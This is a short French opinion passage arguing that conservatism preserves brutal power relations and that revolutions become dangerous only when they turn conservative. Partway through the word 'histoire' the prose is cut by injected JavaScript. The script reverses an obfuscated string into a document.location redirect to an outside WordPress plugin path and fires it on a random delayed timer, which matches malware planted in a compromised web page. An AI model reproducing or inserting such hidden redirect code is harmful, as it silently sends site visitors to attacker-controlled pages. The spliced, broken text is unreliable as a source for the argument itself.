Le conservatisme parait souvent plus positif, rassurant et sécurisant que les mouvements révolutionnaires. Or l’histoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod »];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toire montre assez qu’il tend le plus souvent à maintenir la brutalité des rapports de forces à l’oeuvre. Les mouvements révolutionnaires sont donc a priori positifs et rassurants. Ce n’est que quand ils deviennent « conservateurs » que les mouvements révolutionnaires deviennent dangereux.